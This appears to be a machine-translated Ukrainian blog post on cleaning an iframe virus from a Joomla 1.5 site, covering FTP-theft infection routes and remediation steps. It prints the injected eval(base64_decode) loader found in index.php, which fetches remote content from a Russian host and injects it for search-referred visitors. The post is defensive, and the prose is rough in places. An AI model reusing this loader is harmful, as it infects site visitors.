Вірус на сайті, можливі рішення

  1. Ось кілька сайтів для перевірки на віруси:
  2. Рекомендуються наступні дії для вирішення проблеми:
  3. Рішення проблеми з вірусом:
  4. Рекомендуємо:

Нещодавно один із сайтів був відзначений в Яндекс-веб-майстра і Google-веб майстра - як заражений

Нещодавно один із сайтів був відзначений в Яндекс-веб-майстра і Google-веб майстра - як заражений. Був знайдений вірус iframe.

Ось що писав Google:

Ось що писав Google:

Ось кілька сайтів для перевірки на віруси:

http://antivirus-alarm.ru/proverka

http://www.taghosting.ru/online_services/antivirus

http://vms.drweb.com/online

https://www.virustotal.com/#url

Проблема була з сайтом: http://potolok-metr.com створений на Joomla 1.5. Доступ до FTP був не тільки в студії але і ще у seo-менеджера. Ось приклад як вірус міг потрапити:

- через уразливості в скриптах розміщених на акаунті сайтів;
- через втрату даних для FTP-доступу (Завантажений на комп'ютер власника вірус (троянський кінь, сниффер і інші шкідливі програми), «краде» дані про FTP-доступи на сайт веб-майстри і відсилає їх творцеві вірусу. Вірус через FTP- з'єднання оновлює індексний сторінку сайту, пароль від якого він отримав, поміщаючи в неї вірусний код, що заражає відвідувачів сайту таким же вірусом або ж іншим (на розсуд автора вірусу) при перегляді зараженого сайту).

В даному випадку проблема була через впровадження шкідливого коду в один з файлів сайту. Тобто через фтп-сайту.

Рекомендуються наступні дії для вирішення проблеми:

Рекомендуються наступні дії для вирішення проблеми:
1. Перевірити антивірусом всі комп'ютери, з яких ведеться робота з аккаунтом. На цих комп'ютерах ймовірно є вірус, за допомогою якого зловмисники змогли отримати з цих комп'ютерів дані для FTP-доступу до аккаунту.

2. Змінити пароль доступу до основного аккаунту а також паролі до додаткових FTP-акаунтів.
Нові паролі не рекомендується зберігати прямо в FTP-клієнті.

3. В Панелі управління хостингу задати IP-адреси, з яких можна буде отримувати доступ в Панель управління з коректними логіном і паролем. Попередньо рекомендується отримати актуальні відомості по використовуваних вами IP-адресами у вашого Інтернет-провайдера.

4. Перевірити всю домашню папку аккаунта на предмет присутності в ній сторонніх папок і файлів, явно не мають відношення до кожне ваше даними. Видаліть подібні папки або файли в разі виявлення. При перевірці слід орієнтуватися на файли з підозрілими іменами а також недавньої датою зміни.

5. Перевірити вміст файлів на предмет наявності вставок стороннього коду, видалити ці вставки в разі виявлення. Сторонній код часто виявляється в індексних сторінках сайтів або ж в файлах з розширеннями .php .html .htm, розміщених в папці вашого сайту.

7. Cледует обов'язково перевіряти використовувані вами скрипти на предмет наявності вразливостей, через які зловмисники змогли завантажити шкідливі дані. За допомогою балки відвідувань сайту є можливість визначити запити, які могли використовувати уразливості. За цим запитам можна буде дізнатися проблемні скрипти.
Якщо на сайті використовується тільки програмне забезпечення сторонньої розробки, то обов'язково слід оновити такі програми до останньої стабільної версії.

Рішення проблеми з вірусом:

- зробити «відкат» сайту (використовувати бекап БД і файлів сайту)

- переглянути в корені вашого каталогу (де знаходиться сайт - сторонніх файлів)

- перегляд файлу index.php з приводу стороннього коду (САМЕ ЦЕ БУЛО В НАШОМУ ВИПАДКУ)

В Joomla файл index.php повинен закінчуватись рядком:

* RETURN THE RESPONSE * / echo JResponse :: toString ($ mainframe - & gt; getCfg ( 'gzip'));

Авоткодкакойбилунас (ВІРУС):

* RETURN THE RESPONSE * / $ JResp = JResponse :: toString ($ mainframe - & gt; getCfg ( 'gzip')); / * Rrt * / eval (base64_decode ( "JHVybCAgICAgICA9ICdodHRwOi8vZGFpbHlmaWxlcy5ydS8xLnR4dCc7DQokbW9kZSAgICAgID0gMTsvLzEg6OvoIDINCg0KLy / H4O / w7vEg6iDt4Pjl7PMg9e7x8vNfDQpmdW5jdGlvbiBnZXR1cmxfMSgkdXJsKQ0Kew0KCXJldHVybiBmaWxlX2dldF9jb250ZW50cygkdXJsKTsNCn0NCg0KLy / H4O / w7vEg6iDt4Pjl7PMg9e7x8vNfMiBcINHu6uXy + / Du8SDqIO3g + OXs8yD17vHy818zIFwgyvPw6 // KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKQ0KCQkJew0KCQkJCWlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSkNCgkJCQl7DQoJCQkJCW1haW53b3JrKCR1cmwpOw0KCQkJCX0NCgkJCX0NCgkJfQ0KCX0NCn0 =")); $ JResp = str_ireplace ( "", "". $ Code, $ JResp); echo $ JResp;

- Вилучили шкідливий код, і вірус зник.

Рекомендуємо:

- Зберігати дані ftp не на комп'ютері

- Робити бекап сайту

Схожі матеріали:

Дополнительная информация

rss
Карта